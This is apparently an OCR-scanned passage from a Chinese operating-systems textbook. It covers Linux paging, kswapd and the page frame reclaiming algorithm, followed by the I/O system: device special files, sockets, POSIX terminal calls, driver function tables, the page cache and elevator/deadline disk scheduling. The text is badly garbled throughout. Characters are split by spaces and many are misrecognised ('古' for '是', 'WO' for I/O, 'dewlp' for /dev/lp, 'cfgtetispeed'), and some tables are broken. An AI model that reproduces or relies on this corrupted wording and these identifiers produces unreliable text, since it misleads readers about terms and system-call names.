项 目 被 组 织 成 二 又 “ 红 黑 ? 树 〈 一 种 为 了 快速 得 找 而 优化 的 数据 结构 ) 。 
这 种 方法 用 于 访问 一 个 指定 的 虚拟 内 存 地 址 。 为 了 能 够 用 这 两 种 方法 访 
问 进 程 地 址 空间 的 元 素 ，Linux 为 每 个 进程 使 用 了 更 多 的 状态 ,但 古 却 
允许 不 同 的 内 核 操 作 来 使 用 这 些 访问 方法 ， 这 对 进程 而 言 更 加 高 效 。 























10.4.4 Linux 中 的 分 页 


早期 的 UNIX 系 统 ， 每 当 所 有 的 活动 进程 不 能 容纳 在 物理 内 存 中 时 
就 用 一 个 交换 进程 在 内 存 和 磁盘 之 间 移 动 整 个 进程 。Linux 跟 其 他 现代 
UNIX 版 本 一 样 ， 不 再 移动 整个 进程 了 了。 内存 管理 单元 是 一 个 页 ， 并 且 
几乎 所 有 的 内 存 管理 部 件 以 页 为 操作 粒度 。 交 换 子 系统 也 是 以 页 为 操作 
粒度 的 ， 并 且 跟 页 框 回收 算法 又 耘 合 在 一 起 。 这 个 后 面 会 给 予 描述 。 





Linux 分 页 背后 的 基本 思想 是 简单 的 : 为 了 运行 ， 一 个 进程 并 不 需 
要 完全 在 内 存 中 。 实 际 上 所 需要 的 是 用 户 结构 和 页 表 。 如 果 这 些 被 换 进 
内 存 ， 那 么 进程 被 认为 是 “在 内 存 中 ”， 可 以 被 调度 运行 了 。 人 代码、 数据 
和 栈 段 的 页 面 是 动态 载 入 的 ， 仅 仅 是 在 它们 被 引用 的 时 候 。 如 果 用 户 结 
构 和 页 表 不 在 内 存 中 ， 直 到 交换 器 把 它们 载 入 内 存 进程 才能 运行 。 


分 页 是 一 部 分 由 内 核实 现 而 一 部 分 由 一 个 新 的 进程 ， 页 面 守 护 进 
程 ， 实 现 的 。 页 面 守 护 进 程 是 进程 2( 进 程 0 是 idle 进 程 ， 传 统 上 称 为 交 
换 器 ， 而 进程 1 是 init， 如 图 10-11 所 示 ) 。 跟 所 有 守护 进程 一 样 ， 页 面 守 
护 进程 周期 性 地 运行 。 一 旦 唤醒 ， 它 主动 查找 是 否 有 工作 要 干 。 如 果 它 
发 现 空 闲 页 面 数 量 太 少 ， 就 开始 释放 更 多 的 页 面 。 

















Linux 古 一 个 请 求 换 页 系统 ， 没 有 预 分 页 和 工作 集 的 概念 (尽管 有 
个 系统 调用 ， 其 中 用 户 可 以 给 系统 一 个 提示 将 要 使 用 茶 个 页 面 ， 希望 需 


要 的 时 候 页 面 在 内 存 中 ) 。 代 码 段 和 映射 文件 换 页 到 它们 各 自在 磁盘 上 
的 文件 中 。 所 有 其 他 的 都 被 换 页 到 分 页 分 区 《如 果 存 在 ) 或 者 一 个 固定 
长 度 的 分 页 文件 ， 叫 做 交换 区 。 分 页 文件 可 以 被 动态 地 添加 或 者 删除 ， 
并 且 每 个 都 有 一 个 优先 级 。 换 页 到 一 个 独立 的 分 区 并 且 像 一 个 原始 设备 
那样 访问 的 这 种 方式 要 比 换 页 到 一 个 文件 的 方式 更 加 高 效 。 有 多 个 原 
因 : 首先 ， 文 件 岂 和 磁盘 块 的 映射 不 需要 了 《 布 省 了 磁盘 IO 读 间 接 
BR) ; 其 次 ， 物 理 写 可 以 是 任意 大 小 的 ， 并 不 仅仅 古文 件 块 大 小 ; 第 
三 ， 一 个 页 总 是 被 连续 地 写 到 磁盘 ， 用 一 个 分 页 文件 ， 也 许 是 或 者 也 许 
不 是 这 样 的 。 





页 面 只 有 在 需要 的 时 候 才 在 分 页 设备 或 者 分 区 上 被 分 配 。 每 个 设备 
和 文件 由 一 个 位 图 开始 说 明 哪 些 页 面 是 空间 的 。 当 一 个 没有 备份 存储 的 
页 面 必 须 换 出 的 时 候 ， 仍 有 空闲 空间 的 最 高 优先 级 的 分 页 分 区 或 者 文件 
被 选中 并 且 在 其 上 面 分 配 一 个 页 面 。 正 常情 况 下 ， 分 页 分 区 〈 寿 存 在 ) 
拥有 比 任何 分 页 文件 更 高 的 优先 级 。 页 表 被 及 时 更 新 以 反映 页 面 已 经 不 
在 内 存 了 《如 ，page-not-present 位 被 设置 ) 同时 磁盘 位 置 被 写 入 到 页 表 
项 。 





页 面 置换 算法 


页 面 蔡 换 是 这 样 工 作 的 。Linux 试 图 保留 一 些 空间 页 面 ， 这 样 可 以 
在 需要 的 时 候 分 配 它们 。 当 然 ， 这 个 页 面 池 必须 不 断 地 加 以 补充 。 
PFRA 页 框 回 收 算法 ) 算法 展示 了 它 是 如 何 发 生 的 。 








首先 ，Linux 区 分 四 种 不 同 的 页 面 : 不 可 回收 的 (unreclaimable) 、 
可 交换 的 〈swappable) 、 可 同步 的 〈syncable) 、 可 丢弃 的 
(discardable) 。 不 可 回收 页 面包 括 保留 或 者 锁定 页 面 、 内 核 态 栈 等 ， 
不 会 被 换 出 页 面 。 可 交换 页 必须 在 回收 之 前 写 回 到 交换 区 或 者 分 页 磁盘 
分 区 。 可 同步 的 页 面 如 果 被 标记 为 dirty 就 必须 要 写 回 到 磁盘 。 最 后 ， 可 
丢弃 的 页 面 可 以 被 立即 回收 。 





在 局 动 的 时 候 ，init 开 局 一 个 页 面 守 护 进 程 kswapd (BES AE 
都 有 一 个 ) ， 并 且 配 置 它们 能 周期 性 运行 。 每 次 kswapd 被 唤醒 ， 它 通过 
比较 每 个 内 存 区 域 的 高 低 水 位 来 检查 是 否 有 足够 的 空闲 页 面 可 用 。 如 果 
有 足够 的 空闲 页 面 ， 它 就 继续 睡眠 。 当 然 它 也 可 以 在 需要 更 多 页 面 时 被 
前 唤醒 。 如 果 任 何 内 存 区 域 的 可 用 空间 低 于 一 个 闭 值 ，kswapd 初 始 化 
页 框 回收 算法 。 在 每 次 运行 过 程 中 ， 仅 有 一 个 确定 数目 的 页 面 被 回收 ， 
典型 值 是 32。 这 个 值 是 受 限 的 ， 以 控制 WO 压力 (由 PFRA 操 作 导 致 的 磁 
盘 写 的 次 数 ) 。 回 收 页 面 的 数量 和 扫描 页 面 的 总 数量 是 可 配置 的 参数 。 














Ai 








每 次 PFRA 执 行 ， 它 首先 回收 容易 的 页 面 ， 然 后 处 理 更 难 的 。 可 丢 
弃 页 面 和 未 被 引用 的 页 面部 是 可 以 被 立即 回收 的 ， 同 时 把 它们 添加 到 区 
域 的 空闲 链表 中 。 接 独 它 查找 有 备份 存储 同时 近期 末 被 使 用 的 页 面 ， 使 
用 一 个 类 似 于 时 钟 的 算法 。 再 后 来 束 是 用 户 使 用 不 多 的 共享 页 面 。 共 有 侍 
页 面 带 来 的 挑战 是 ， 如 果 一 个 页 面 被 回收 ， 那 么 所 有 共 人 至 了 该 页 面 的 所 
有 地 址 空间 的 页 表 都 要 同步 更 新 。Linux 维 护 高 效 的 类 树 数 据 结构 来 方 








便 地 找到 一 个 共享 页 面 的 所 有 使 用 者 。 普 通用 户 页 面 在 此 之 后 被 查找 ， 
如 果 被 选中 换 出 ， 它 们 必须 被 调度 写 入 交换 区 。 系 统 的 swappiness， 妈 
有 备份 存储 的 页 面 和 在 PFRA 中 被 换 出 的 页 面 的 比率 ， 是 该 算法 的 一 个 
可 调 参数 。 最 后 ， 如 果 一 个 页 是 无 效 的 、 不 在 内 存 、 共 享 、 锁 定 在 内 存 
或 者 拥有 DMA， 那 么 它 被 跳 过 。 





PFRA 用 一 个 类 似 时 钟 的 算法 来 选择 旧 页 面 换 出 。 这 个 算法 的 核心 
古 一 个 循环 ， 它 扫描 每 个 区 域 的 活动 和 非 活 动 列表 ， 试 图 按照 不 同 的 紧 
迫 程 度 回 收 不 同类 型 的 页 面 。 紧 迫 性 数值 作为 一 个 参数 传递 给 该 过 程 ， 
说 明 人 花费 多 大 的 代价 来 回收 一 些 页 面 。 通 常 ， 这 意味 独 在 放弃 之 前 检查 


多 少 个 页 面 。 











在 PFRA 期 间 ， 页 面 按 照 图 10-18 描 述 的 方式 在 活动 和 非 活动 列表 之 
间 移 来 移 去 。 为 了 维护 一 些 局 发 并 且 尺 量 找 出 没有 被 引用 的 和 近期 不 可 
能 被 使 用 的 页 面 ，PFRA 为 每 个 页 面 维护 两 个 标记 : 活动 / 非 活动 和 是 否 
被 引用 。 这 两 个 标记 构成 四 种 状态 ， 如 图 10-18 所 示 。 在 对 一 个 页 面 集 
合 的 第 一 过 扫描 中 ，PFRA 首 移 清除 它们 的 引用 位 。 如 果 在 第 二 次 运行 
期 间 确 定 它 已 经 被 引用 ， 则 把 它 提 升 到 为 一 个 状态 ， 这 样 束 不 太 可 能 
收 它 了 。 人 否则 ， 将 该 页 面 移动 到 一 个 更 可 能 被 回收 的 状态 。 





非 活 动 活动 


PG_active = 0 i PG_active = 1 


PG_referenced = 0 PG_referenced = 0 






被 使 用 超时 被 使 用 


PG_active =0 上 PG_active = 1 


PG_referenced = 1 PG_referenced = 1 


图 10-18 页 框 置换 工法 中 考虑 的 页 面 状 态 


处 在 非 活动 列表 上 的 页 面 ， 自 从 上 次 检查 未 被 引用 过 ， 故 而 是 移出 
的 最 佳 候选 。 有 些 页 面 的 PG_active 和 了 PG_referenced 都 被 置 为 0， 如 图 10- 
18。 然 而 ， 如 果 和 需要， 处 于 其 他 状态 的 页 面 也 可 能 会 被 回收 。 图 10-18 
中 的 重 装 箭头 就 说 明 这 个 事实 。 











PFRA 维 护 一 些 页 面 ， 尽 管 可 能 已 经 被 引用 但 在 非 活动 列表 中 ， 其 
原因 是 为 了 避免 如 下 的 情形 。 考 虑 一 个 进程 周期 性 访问 不 同 的 页 面 ， 比 
如 周期 为 1 个 小 时 。 从 最 后 一 次 循环 开始 被 访问 的 页 面 会 设置 其 引用 标 
志 位 。 然 而 ， 接 下 来 的 一 个 小 时 里 不 再 使 用 它 ， 没 有 理由 不 考虑 把 它 作 





为 一 个 回收 的 候选 。 


10.5 Linux 中 的 VO 系统 


Linuxz 和 其 他 的 UNIX 系 统一 样 ，IO 系 统 都 相当 的 简单 明了 。 基 本 
上 ， 上 所 有 的 IO 设备 都 被 当 作文 件 来 处 理 ， 并 且 通 过 与 访问 所 有 文件 同 
样 的 read 和 write 系统 调用 来 访问 。 在 某 些 情况 下 ， 必 须 通过 一 个 特殊 的 
系统 调用 来 设置 设备 的 参数 。 我 们 会 在 下 面 的 章节 中 学 习 这 些 细 节 。 





10.5.1 基本 概念 





像 所 有 的 计算 机 一 样 ， 运 行 Linux 的 计算 机 具有 磁盘 、 打 印 机 、 网 
络 等 1O 设 备 。 需 要 一 些 策略 才能 使 程序 能 够 访问 这 些 设备 。 有 很 多 不 
同 的 方法 都 可 以 达到 目的 ，Linux 把 设备 当 作 一 种 特殊 文件 整合 到 文件 
系统 中 。 每 个 IO 设备 都 被 分 配 了 一 条 路 径 ， 通 党 在 /dev 目 录 下 。 例 如 : 
一 个 磁盘 的 路 径 可 能 是 “/dev/hd1”， 一 个 打印 机 的 路 径 可 能 是 “/dev/lp”， 
网 络 的 路 径 可 能 是 “/dev/net”。 








可 以 用 与 访问 其 他 普通 文件 相同 的 方式 来 访问 这 些 特殊 文件 。 不 需 
要 特殊 的 命令 或 者 系统 调用 。 第 用 的 open、read、write 等 系统 调用 就 够 
用 了 。 例 如 : 下 面 的 命令 





cp file/dev/1p 





把 文件 “file” 复 制 到 打印 机 “dewlp”， 然 后 开始 打印 《假设 用 户 具 有 
访问 “%dewlp” 的 权限 ) 。 程 序 能 够 像 操 作 普通 文件 那样 打开 、 读 、 与 特 
殊 文 件 。 实 际 上 ， 上 面 的 “cp” 命 令 其 至 不 知道 是 要 打印 “file” 文 件 。 通 过 
这 种 方法 ， 不 需要 任何 特殊 的 机 制 残 能 进行 LO。 


特殊 文件 (设备 ) 分 为 两 类 ， 块 特殊 文件 和 字符 特殊 文件 。 一 个 块 
特殊 文件 由 一 组 具有 编号 的 块 组 成 。 块 特殊 文件 的 主要 特性 是 ， 每 一 个 
块 都 能 够 被 独立 地 寻 址 和 访问 。 也 束 是 说 ,一 个 程序 能 够 打开 一 个 块 特 
殊 文 件 ， 并 且 不 用 读 第 0 块 到 第 123 块 就 能 够 读 第 124 块 。 磁 盘 就 是 块 特 
殊 文件 的 典型 应 用 。 





字符 特殊 文件 通常 用 于 表示 输入 和 输出 字符 流 的 设备 。 键 盘 、 打 印 
机 、 网 络 、 鼠 标 、 绘 图 机 以 及 大 部 分 接受 用 户 数据 或 癌 用 户 输 出 数据 的 
设备 都 使 用 字符 特殊 文件 来 表示 。 访 问 一 个 鼠标 的 124 块 是 不 可 能 的 
(甚至 是 无 意义 的 ) 。 


每 个 特殊 文件 部 和 一 个 处 理 其 对 应 设备 的 设备 驱动 相关 联 。 每 个 驱 
动 程序 都 通过 一 个 主 设备 号 来 标识 。 如 果 一 个 驱动 程序 支持 多 个 设备 ， 
如 ， 相 同类 型 的 两 个 磁盘 ， 每 个 磁盘 使 用 一 个 次 设备 号 来 标识 。 主 设备 
号 和 次 设备 号 结合 在 一 起 能 够 惟一 地 确定 每 个 WO 设备 。 在 很 少 的 情况 
下 ， 一 个 单独 的 驱动 程序 处 理 两 种 关系 密切 的 设备 。 比 如 : 

与 “dewitty” 联 合 的 驱动 程序 同时 控制 着 键盘 和 显示 器 ， 这 两 种 设备 通 毅 
被 认为 是 一 种 设备 ， 即 终端 。 




















大 部 分 的 字符 特殊 文件 都 不 能 够 被 随机 访问 ， 因 此 它们 通常 需要 用 
不 同 于 块 特殊 文件 的 方式 来 控制 。 比 如 ， 由 键盘 上 键入 输入 字符 并 显示 
在 显示 器 上 。 当 一 个 用 户 键入 了 一 个 错误 的 字符 ， 并 且 想 取消 键入 的 最 
后 一 个 字符 时 ， 他 禹 击 其 他 的 键 。 有 人 豆 欢 使 用 backspace" 回 退 键 ， 也 
有 人 喜欢 “del" 删 除 键 。 类 似 地 ， 为 了 取消 刚 键 入 的 一 行 字符 ， 也 有 很 多 
方法 。 传 统 的 方法 是 输入 “@”， 但 是 随 着 e-mail 的 传播 在 电子 邮件 地 
址 中 使 用 @) ， 一 些 系统 使 用 “CTRL+U” 或 者 其 他 字符 来 达到 目的 。 同 
样 的 ， 为 了 中 断 正 在 运行 的 程序 ， 需 要 使 用 一 些 特殊 的 键 。 不 同 的 人 有 
不 同 的 偏爱 。“CTRL+C” 是 常用 的 方法 ， 但 不 是 惟一 的 。 





Linux 人 允许 用 户 目 定义 这 些 特 殊 的 功能 ， 而 不 是 强迫 每 个 人 使 用 系 
统 选择 的 那 种 。Linux 提 供 了 一 个 专门 的 系统 调用 来 设置 这 些 选 项 。 这 
个 系统 调用 也 处 理 tab 扩 展 ， 字 符 输 出 有 效 、 失 效 ， 回 车 和 换行 之 间 的 
转换 等 类 似 的 功能 。 这 个 系统 调用 不 能 用 于 普通 文件 和 块 特殊 文件 。 


10.5.2 WZ 


IO 的 另外 一 个 例子 是 网 络 ， 由 Berkeley UNIX 首 创 并 在 Linux 中 差 不 
多 原封 不 动 引 入 。 在 Berkeley 的 设计 中 ， 关 键 概念 是 套 接 字 (socket) 。 
套 接 字 与 邮 简 和 墙壁 上 的 电话 插座 是 类 似 的 ， 因 为 套 接 字 人 允许 用 户 连 接 
到 网 络 ， 正 如 邮 简 允许 用 户 连接 到 邮政 系统 ， 墙 壁 上 的 电话 插座 人 允许 用 
户 插入 电话 并 且 连 接 到 电话 系统 。 套 接 字 的 位 置 见 图 10-19。 套 接 字 可 
以 被 动态 创建 和 销毁 。 创 建 一 个 套 接 字 成 功 后 ， 系 统 返 回 一 个 文件 描述 
符 。 创 建 连接 、 读 数据 、 写 数据 、 解 除 连接 时 要 用 到 这 个 文件 描述 符 。 


发 送 进程 接收 进程 





网 络 


图 10-19 网 络 中 使 用 套 接 字 





每 个 套 接 字 文 持 一 种 特定 的 网 络 类 型 ， 这 在 僚 接 字 创 建 时 指定 。 最 


常用 的 类 型 是 : 





1) 可 靠 的 面向 连接 的 字 节 流 。 
2) 可 徘 的 面 同 连 接 的 数据 包 流 。 
3) 不 可 靠 的 数据 包 传输 。 


第 一 种 套 接 字 类 型 允许 在 不 同 机 右上 的 两 个 进程 之 间 建 立 一 个 等 同 
于 管道 的 连接 。 字 节 从 一 个 端点 注入 然后 按 注 入 的 顺序 从 另外 一 个 端点 
流出 。 系 统 保证 所 有 被 传送 的 字 节 都 能 够 到 达 ， 并 且 按 照发 送 时 的 顺序 
到 达 。 





除 保 留 了 数据 包 之 间 的 分 界 之 外 ， 第 二 种 类 型 和 第 一 种 是 相同 的 。 
如 果 发 送 者 调用 了 5 次 写 操 作 ， 每 次 写 了 512 字 节 ， 而 接收 者 要 接收 2560 
字 节 ， 那 么 使 用 第 一 种 类 型 的 套 接 字 ， 接 收 者 接收 一 次 会 立刻 接收 到 所 
有 2560 个 字 节 。 要 是 使 用 第 二 种 类 型 的 套 接 字 ， 接 收 者 一 次 只 能 收 到 
512 个 字 节 ， 而 要 得 到 剩 下 的 数据 ， 还 需要 再 进行 4 次 调用 。 用 户 可 以 使 
用 第 三 种 类 型 的 套 接 字 来 访问 原始 网 络 。 这 种 类 型 的 套 接 字 尤其 适用 于 
实时 应 用 和 用 户 想 要 实现 特定 错误 处 理 模式 的 情况 。 数 据 包 可 能 会 丢失 
或 者 被 网 络 重 排序 。 和 前 两 种 方式 不 同 ， 这 种 方式 没有 任何 保证 。 第 三 
种 方式 的 优点 是 有 更 高 的 性 能 ， 而 有 时 候 它 比 可 靠 性 更 加 重要 《如 在 传 
输 多 媒体 时 ， 快 速 比 正确 性 更 有 用 〉。 

















在 创建 套 接 字 时 ， 有 一 个 参数 指定 使 用 的 协议 。 对 于 可 靠 字 节 流通 
信 来 说 ， 使 用 最 广泛 的 协议 是 TCP〔 传 输 控制 协议 ) 。 对 于 不 可 靠 数据 


包 传 输 来 说 ，UDP “用户 数据 报 协议 ) 是 最 常用 的 协议 。 这 两 种 协议 都 
位 于 IP (互联 网 协议 ) 层 之 上 上。 这些 协议 都 源 于 美国 国防 部 的 
ARPANET， 现 在 成 为 互联 网 的 基础 。 没 有 可 靠 数 据 包 流 类 型 的 通用 协 
议 。 


在 一 个 套 接 字 能 够 用 于 网 络 通 信之 前 ， 必 须 有 一 个 地 址 与 它 绑 定 。 
这 个 地 址 可 以 是 几 个 命名 域 中 的 一 个 。 最 常用 的 域 为 互联 网 (Internet) 
命名 域 ， 它 在 V4〈 第 4 个 版 本 ) 中 使 用 32 位 整数 作为 其 命名 问 点 ， 在 V6 
中 使 用 128 位 整数 〈V5 是 一 个 实验 系统 ， 从 未 成 为 主流 ) 。 


一 旦 套 接 字 在 源 计 算 机 和 目的 计算 机 都 建立 成 功 ， 则 两 个 计算 机 之 
间 可 以 建立 起 一 个 连接 (对 于 面向 连接 的 通信 来 说 )。 一 方 在 本 地 套 接 
字 上 使 用 一 个 listen 系 统 调用 ， 它 创建 一 个 缓冲 区 并 且 阻 窒 ， 直 到 数据 到 
来 。 丸 一 方 使 用 connect 系 统 调用 ， 并 且 把 本 地 人 套 接 字 的 文件 摘 述 符 和 远 
程 套 接 字 的 地 址 作为 参数 传递 进去 。 如 果 远 程 一 方 接受 了 此 次 调用 ， 则 
系统 在 两 个 套 接 字 之 间 建 立 起 一 个 连接 。 














一 旦 连接 建立 成 功 ， 它 的 功能 就 类 似 于 一 个 管道 。 一 个 进程 可 以 使 
用 本 地 套 接 字 的 文件 描述 符 来 从 中 读 写 数据 。 当 此 连接 不 再 需要 时 ， 可 
以 用 常用 的 方式 ， 即 通过 close 系 统 调用 来 关闭 它 。 


10.5.3 Linux 的 输入 /输出 系统 调用 


Linux 系 统 中 的 每 个 /WO 设备 都 有 一 个 特殊 文件 与 其 关联。 大 部 分 的 
IO 只 使 用 合适 的 文件 就 可 以 完成 ， 并 不 需要 特殊 的 系统 调用 。 然 而 ， 
有 时 需要 一 些 设备 专用 的 处 理 。 在 POSIX 之 前 ， 大 部 分 UNIX 系 统 有 一 
个 叫 作 ioctl 的 系统 调用 ， 它 在 特殊 文件 上 执行 大 量 设备 专用 的 操作 。 数 
年 之 间 ， 此 系统 调用 已 经 变 得 非常 混乱 。POSIX 对 其 进行 了 清理 ， 把 它 
的 功能 划分 为 主要 面向 终端 设备 的 独立 的 功能 调用 。 在 Linux 和 现代 
UNIX 系 统 中 ， 每 个 功能 调用 是 独立 的 系统 调用 ， 还 是 它们 共享 一 个 单 
独 的 系统 调用 或 者 其 他 的 方式 ， 都 是 依赖 于 实现 的 。 





在 图 10-20 中 的 前 4 个 系统 调用 用 来 设置 和 获取 终端 速度 。 为 输入 和 
输出 提供 不 同 的 系统 调用 是 因为 一 些 调制 解 调 器 工作 速率 不 同 。 例 如 ， 
旧 的 可 视图 文系 统 允许 用 户 在 家 通过 短 请 求 以 75 位 /s 的 上 传 速度 访问 服 
务 器 上 的 公共 数据 ， 而 下 载 速度 为 1200 位 /s。 这 个 标准 在 一 段 时 间 内 被 
采用 ， 因 为 对 于 家 性 应 用 来 说 ， 输 入 输出 时 都 采用 1200 位 / 秒 则 太 昂贵 
了 。 网 络 世 界 中 的 时 代 已 经 改变 了 。 不 对 称 性 仍然 存在 ， 一 些 电话 公司 
提供 8Mbps 的 入 站 服务 和 512kbps 的 出 站 服务 ， 称 为 ADSL 〈 非 对 称 数 字 
用 户 环线 ) 。 

















函数 调用 Hi 
s=cfsetospeed (&termios,speed) | 设置 输出 速率 
设置 输入 速率 
s=cfgetospeed (&termios,speed ) 获取 输出 速率 
s=cfgtetispeed (&termios,speed ) 获取 输入 速率 


s=tcsetattr (fd,opt,&termios ) 设置 属性 
s=tcgetattr (fd,&termios ) 获取 属性 


图 10-20 管理 终端 的 主要 POSIX 系 统 调 用 





s=cfsetispeed (&termios,speed) 






列表 中 的 最 后 两 个 系统 调用 主要 用 来 设置 和 读 回 所 有 用 来 消除 字符 
和 行 以 及 中 断 进程 等 功能 的 特殊 字符 。 男 外 ， 它 们 可 以 使 回 最 有 效 或 无 
效 ， 管 理 流 控 制 及 其 他 相关 功能 。 还 有 一 些 WO 功 能 调用 ， 但 是 它们 都 
是 专用 的 ， 所 以 这 里 残 不 进一步 讨论 了 。 此 外 ，ioctl 系 统 调 用 依然 可 
用 。 


10.5.4 ”输入 /输出 在 Linux 中 的 实现 





在 Linux 中 1/O 是 通过 一 系列 的 设备 驱动 来 实现 的 ， 每 个 设备 类 型 对 
应 一 个 设备 驱动 。 设 备 驱 动 的 功能 是 对 系统 的 其 他 部 分 隔离 硬件 的 细 
节 。 通 过 在 驱动 程序 和 操作 系统 其 他 部 分 之 间 提 供 一 层 标准 的 接口 ， 使 
得 大 部 分 IO 系 统 可 以 被 划 归 到 内 核 的 机 器 无 关 部 分 


当 用 户 访问 一 个 特殊 文件 时 ， 由 文件 系统 提供 此 特殊 文件 的 主 设备 
写 和 次 设备 写 ， 并 判断 它 是 一 个 块 特殊 文件 还 是 一 个 字符 特殊 文件 。 主 
设备 写 用 于 索引 存 有 字符 设备 或 者 块 设备 数据 结构 的 两 个 内 部 散 列 表 之 
一 。 定 位 到 的 数据 结构 包含 指 癌 打开 设备 、 读 设备 、 写 设备 等 功能 的 函 
数 指针 。 次 设备 号 被 当 作 参 数 传递 。 在 Linux 系 统 中 添加 一 个 新 的 设备 
类 型 ， 意 味 着 要 向 这 些 表 添加 一 个 新 的 表 项 ， 并 提供 相应 的 函数 来 处 理 
此 设备 上 的 各 种 操作 。 











图 10-21 展 示 了 一 部 分 可 以 跟 不 同 的 字符 设备 关联 的 操作 。 每 一 
指 回 一 个 单独 的 IO 设备 《〈 即 一 个 单独 的 驱动 程序 ) 。 列 表示 所 有 的 字 
和 从 驱动 程序 必须 支持 的 功能 。 还 有 几 个 其 他 的 功能 。 当 一 个 操作 要 在 一 
个 字符 特殊 文件 上 执行 时 ， 系 统 通 过 检索 字符 设备 的 散 列 表 来 选择 合适 
的 数据 结构 ， 然 后 调用 相应 的 功能 来 执行 此 操作 。 因 此 ， 每 个 文件 操作 
都 包含 指 回 相 应 驱动 程序 的 一 个 函数 指针 。 





















































设备 Open Close Read | Write loctl 其 他 
Null null null | null null null 
内 存 null null mem read | mem write | null 
键盘 | k_open k_close | k_read error k_ioctl 
Tty tty_open tty_close tty_read i tty_write tty_ioctl 
打印 机 Ip_open | Ip_close error Ip_write ip_ioctl 








图 10-21 典型 字符 设备 支持 的 部 分 文件 操作 





每 个 驱动 程序 都 分 为 两 部 分 。 这 两 部 分 都 是 Linux 内 核 的 一 部 分 ， 
并 且 都 运行 在 内 核 态 。 上 半 部 分 运行 在 调用 者 的 上 下 文 并 且 与 Linux 其 
他 部 分 交互 。 下 半 部 分 运行 在 内 核 上 下 文 并 且 与 设备 进行 交互 。 驱 动 程 
序 可 以 调用 内 存 分 配 、 定 时 器 管理 、DMA 控 制 等 内 核 过 程 。 所 有 可 以 
被 调用 的 内 核 功能 都 定义 在 一 个 叫做 驱动 程序 -内 核 接 口 (Driver-Kernel 
Interface) 的 文档 中 。 编 写 Linux 设 备 驱 动 的 细节 请 参见 文献 〈Egan 和 
Teixeira, 1992; Rubini 等 人 ，2005) 。 








IO 系统 被 划分 为 两 大 部 分 : 处 理 块 特 殊 文 件 的 部 分 和 处 理 字符 特 
殊 文 件 的 部 分 。 下 面 将 依次 讨论 这 两 部 分 。 





系统 中 处 理 块 特 殊 文件 〈 比 如 ， 磁 盘 ) IO 的 部 分 的 目标 是 使 必须 
要 完成 的 传输 次 数 最 小 。 为 了 实现 这 个 目标 ，Linux 系 统 在 磁盘 驱动 程 
序 和 文件 系统 之 间 放 置 了 一 个 高 速 缓存 (cache〉， 如 图 10-22。 在 2.2 版 
本 内 核 之 前 ，Linux 系 统 完整 地 维护 着 两 个 单独 的 缓存 ， 页 面 缓存 
(page cache) 和 缓冲 器 缓存 (buffer cache) ， 因 此 ， 存 储 在 一 个 磁盘 





块 中 的 文件 可 能 会 被 缓存 在 两 个 缓存 中 。2.2 版 本 以 后 的 Linux 内 核 版 本 
只 有 一 个 统一 的 缓存 。 一 个 通用 数据 块 层 〈(generic block layer) 把 这 些 
组 件 整合 在 了 一 起 ， 执 行 磁盘 鹿 区 、 数 据 块 、 绥 冲 区 和 数据 页 面 之 间 必 
要 的 转换 ， 并 且 激 活 作 用 于 这 些 结构 上 的 操作 。 





虚拟 文件 系统 
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图 10-22 Linux 1/O 〇 系统 中 一 个 文件 系统 的 细节 


cache 是 内 核 里 面 用 来 保存 数 以 干 计 的 最 近 使 用 的 数据 块 的 表 。 不 
管 本 大 什么 样 的 目的 (i 节操 ， 目 录 或 数据 ) 而 需要 一 个 磁盘 块 ， 系 统 


首先 检查 这 个 块 是 个 在 cache 里 面 。 如 果 在 cache 中 ， 就 可 以 从 cache 里 直 
接 得 到 这 个 块 ， 从 而 避免 了 一 次 人 磁盘 访问 ， 这 可 以 在 很 大 程度 上 提高 系 
统 性 能 。 


如 果 页 面 cache 中 没有 这 个 块 ， 系 统 就 会 从 磁盘 中 把 这 个 块 读 入 到 
cache 中 ， 然 后 再 从 cache 中 复制 到 请 求 它 的 地 方 。 由 于 页 面 cache 的 大 小 
是 固定 的 ， 因 此 ， 前 面 章 节 介 绍 的 页 面 置换 算法 在 这 里 也 是 需要 的 。 


页 面 cache 也 文 持 写 数据 块 ， 就 像 读 数据 一 样 。 一 个 程序 要 回 写 一 
个 块 时 ， 它 被 写 到 cache 里 ， 而 不 是 直接 写 到 磁盘 上 。 当 cache 增 长 到 超 
过 一 个 指定 值 时 ，pdflush 守 护 进 程 会 把 这 个 块 写 回 到 磁盘 上 。 为 外 ， 为 
了 防止 数据 块 被 写 回 到 磁盘 之 前 在 cache 里 存留 太 长 时 间 ， 每 隔 30 秒 系 
统 会 把 所 有 的 “ 脏 块 ”都 写 回 到 磁盘 上 。 


Linux 依 靠 一 个 IO 调度 器 来 保证 磁头 反复 移动 的 延迟 最 小 。LUO 调 度 
器 的 作用 是 对 块 设备 的 读 写 请 求 重新 排序 或 对 这 些 读 写 请 求 进行 合并 。 
有 很 多 调度 器 变种 ， 它 们 是 根据 不 同类 型 的 工作 负载 进行 优化 的 结果 。 
基本 的 Linux WO 调度 器 基于 最 初 的 Linus 电 梯 调 度 器 (Linus Elevator 
scheduler) 。 电 梯 调 度 器 的 操作 可 以 这 样 总 结 : 按 磁盘 请 求 的 扇 区 地 址 
的 顺序 将 磁盘 操作 在 一 个 双向 链表 中 排序 。 新 的 请 求 以 排序 的 方式 插入 
到 双向 链表 中 。 这 种 方法 可 以 有 效 地 防止 磁头 重复 移动 。 请 求 列 表 经 过 
合并 后 ， 相 邻 的 操作 会 被 整合 为 一 条 单独 的 磁盘 请 求 。 基 本 电梯 调度 器 
有 一 个 问题 是 会 导致 饥饿 的 情况 发 生 。 因 此 ，Linux 磁 盘 调 度 器 的 修改 














版 本 包括 两 个 附加 的 列表 ， 维 护 按时 限 (deadline〉 排序 的 读 写 操作 。 

读 请 求 的 缺 省 时 限 是 0.5s， 写 请 求 的 缺 省 时 限 是 5s。 如 果 最 早 的 写 操作 
的 系统 定义 的 时 限 要 过 期 7 了 7， 那么 相对 于 任何 在 主 双向 链表 中 的 请 求 来 
说 ， 这 个 写 请 求 会 被 优先 服务 。 





除了 正常 的 磁盘 文件 ， 还 有 其 他 的 块 特 殊 文 件 ， 也 被 称 为 原始 块 文 
件 Craw block file) 。 这 些 文 件 允 许 程序 通过 绝对 块 号 来 访问 磁盘 ， 而 
不 考虑 文件 系统 。 它 们 通常 被 用 于 分 页 和 系统 维护 。 





与 字符 设备 的 交互 是 很 简单 的 。 因 为 字符 设备 产生 和 接收 的 是 字符 
流 或 字 节 数据 ， 所 以 让 字符 设备 文 持 随机 访问 是 几乎 没有 意义 的 。 不 过 
行规 则 Cline disciplines) 的 使 用 是 个 例外 。 一 个 行规 则 可 以 和 一 个 终端 
